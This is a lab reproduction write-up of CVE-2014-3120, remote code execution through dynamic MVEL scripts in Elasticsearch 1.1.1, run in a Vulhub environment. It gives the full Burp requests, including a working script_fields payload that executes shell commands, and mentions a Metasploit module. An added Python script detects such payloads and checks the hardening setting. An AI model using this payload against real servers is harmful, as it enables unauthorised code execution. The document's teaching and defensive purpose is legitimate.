CVE-2014-3120 - ElasticSearch Command Execution Vulnerability
Vulnerability impact
- jre version: openjdk:8-jre
- elasticsearch version: v1.1.1
Vulnerability principle
Older versions of ElasticSearch accept dynamic scripts (MVEL) submitted with a request so that complex operations can be performed server-side. MVEL can execute Java code and runs without any sandbox, so an attacker can execute arbitrary code directly.
Vulnerability recurrence
This reproduction uses the Vulhub lab environment, which needs to be set up locally first.
Enter the lab environment directory and start the environment with the following command:
docker-compose up -d
Check whether the environment's port is open:
docker-compose ps
Vulnerability testing
Access the target URL: http://192.168.0.109:9200/
The vulnerability requires at least one document in Elasticsearch, so create one first. In Burp Suite, open the Repeater module and send the following request:
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "phithon"
}
Then execute arbitrary code with the following request:
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
The result is shown in the figure:
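As an added defensive example (not part of the original write-up or of Vulhub), the following Python script shows two checks a defender would want around this request pattern: it classifies search bodies by whether they carry a dynamic script under a "script" key at all, and whether that script matches process-execution indicators such as the Runtime.getRuntime() call used above; and it inspects an elasticsearch.yml fragment for script.disable_dynamic: true, the 1.x setting that turns dynamic scripting off. The sample bodies and config fragments are constructed for the example, and the indicator regex is an assumed starting list, not an exhaustive signature.

```python
import json
import re

# Indicators of scripts that reach out of MVEL into process execution or
# reflection. This list is an assumption for the example, not a complete signature.
RISKY_PATTERNS = re.compile(
    r"Runtime\.getRuntime\(\)|ProcessBuilder|\bimport\s+java\b|java\.lang\.|getClass\(\)\.forName"
)

# Constructed sample request bodies (not captured traffic). Body 1 reuses the
# script_fields shape from the write-up; body 2 is a harmless dynamic script;
# body 3 is not JSON at all.
SAMPLE_BODIES = [
    json.dumps({"size": 1, "query": {"match_all": {}}}),
    json.dumps({
        "size": 1,
        "query": {"filtered": {"query": {"match_all": {}}}},
        "script_fields": {"command": {"script":
            'import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id")'
            '.getInputStream()).useDelimiter("\\\\A").next();'}},
    }),
    json.dumps({"script_fields": {"double_price": {"script": "doc['price'].value * 2"}}}),
    "not json at all",
]

# Constructed elasticsearch.yml fragments.
DEFAULT_YAML = "cluster.name: elasticsearch\nnode.name: node-1\n"
HARDENED_YAML = "cluster.name: elasticsearch\n# block inline MVEL scripts\nscript.disable_dynamic: true\n"
COMMENTED_YAML = "cluster.name: elasticsearch\n# script.disable_dynamic: true\n"


def _walk(node, found):
    """Collect every string value stored under a 'script' key, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "script" and isinstance(value, str):
                found.append(value)
            else:
                _walk(value, found)
    elif isinstance(node, list):
        for item in node:
            _walk(item, found)


def extract_scripts(body):
    """Return the list of script strings in a JSON body, or None if it is not JSON."""
    try:
        parsed = json.loads(body)
    except ValueError:
        return None
    found = []
    _walk(parsed, found)
    return found


def classify_request(body):
    """Label a request body: unparsed, clean, dynamic-script or suspicious-script."""
    scripts = extract_scripts(body)
    if scripts is None:
        return "unparsed"
    if not scripts:
        return "clean"
    if any(RISKY_PATTERNS.search(s) for s in scripts):
        return "suspicious-script"
    return "dynamic-script"


# Only an uncommented line counts; '# script.disable_dynamic: true' does nothing.
_DISABLE_RE = re.compile(r"^[ \t]*script\.disable_dynamic[ \t]*:[ \t]*(\S+)", re.MULTILINE)


def dynamic_scripting_disabled(yaml_text):
    """True when elasticsearch.yml sets script.disable_dynamic: true."""
    match = _DISABLE_RE.search(yaml_text)
    return bool(match) and match.group(1).strip("\"'").lower() == "true"


if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES):
        print(f"body {i}: {classify_request(body)}")
    for name, text in [("default", DEFAULT_YAML), ("hardened", HARDENED_YAML), ("commented", COMMENTED_YAML)]:
        print(f"{name} config: dynamic scripting disabled = {dynamic_scripting_disabled(text)}")
```

Any "dynamic-script" hit, not only the "suspicious-script" ones, is worth alerting on while a 1.x node still has dynamic scripting enabled, because the indicator list can only catch the patterns it knows about; the setting check is the durable control, and Elasticsearch 1.2 and later ship with dynamic scripting disabled by default.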
MSF exploit
Start the MSF framework, search for CVE-2014-3120, select the corresponding module, set its parameters and run the exploit.